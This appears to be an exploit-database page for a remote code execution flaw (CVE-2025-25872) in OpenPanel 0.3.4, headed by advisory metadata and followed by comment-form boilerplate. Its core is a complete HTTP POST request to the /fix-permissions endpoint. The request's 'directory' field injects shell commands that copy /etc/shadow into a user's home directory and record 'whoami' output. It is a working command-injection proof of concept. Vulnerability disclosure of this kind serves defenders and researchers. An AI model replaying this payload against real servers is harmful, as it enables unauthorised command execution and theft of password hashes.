OpenPanel 0.3.4 Remote Code Execution

2025.03.05

Credit: Multiple

Risk: High

Local: No

Remote: Yes

CVE: CVE-2025-25872

CWE: N/A

# Exploit Title: OpenPanel 0.3.4 - Remote Code Execution via Fix Permission
# Date: Nov 7, 2024
# Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2025-25872

POST /fix-permissions HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyOFQ.ilfMmYNxLNnGlJ8NtQ5-25YRLQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/fix-permissions
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

directory=%2Fhome%2Fstefan%2F%3B%20cat%20%2Fetc%2Fshadow%20%3E%20%2Fhome%2Fstefan%2Fshadow.txt%3B%20whoami%20%3E%20%2Fhome%2Fstefan%2Frce_test.txt

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

OpenPanel 0.3.4 Remote Code Execution

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

OpenPanel 0.3.4 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.